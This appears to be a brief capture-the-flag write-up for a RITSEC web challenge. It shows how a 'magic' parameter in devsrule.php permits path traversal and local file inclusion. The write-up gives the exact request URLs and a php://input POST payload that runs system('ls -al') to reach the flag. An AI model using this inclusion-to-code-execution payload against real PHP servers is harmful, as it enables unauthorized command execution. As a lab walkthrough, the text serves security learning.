Challenge Description :
fun.ritsec.club:8007
Author: jok3r
Ok. Let’s check the url with port 8007 .
I check the source code and found some interesting link to go next page. eg.
I follow this all link and finally get the useful info at Stars.html
call this devsrule.php file . I found some interesting parameter name magic . so try to insert something to this parameter. aaaaaaaa but it not work.
Ok. Try with ../ Yeah. It work
http://fun.ritsec.club:8007/devsrule.php?magic=../
Ok try to test Remote file inclusion vulnerable with google link. 😉
http://fun.ritsec.club:8007/devsrule.php?magic=http://www.google.com/robots.txt
RFI not work. but let’s try with Local File Inclusion(LFI) php://input method. but you need to insert data with post method
GET
http://fun.ritsec.club:8007/devsrule.php?magic=php://input
POST Data
<?php echo "<pre>"; system('ls -al'); ?>
Now i search the flag.txt and read it.
The flag is
RITSEC{WOW_THAT_WAS_A_PAIN_IN_THE_INPUT}
Thanks for reading..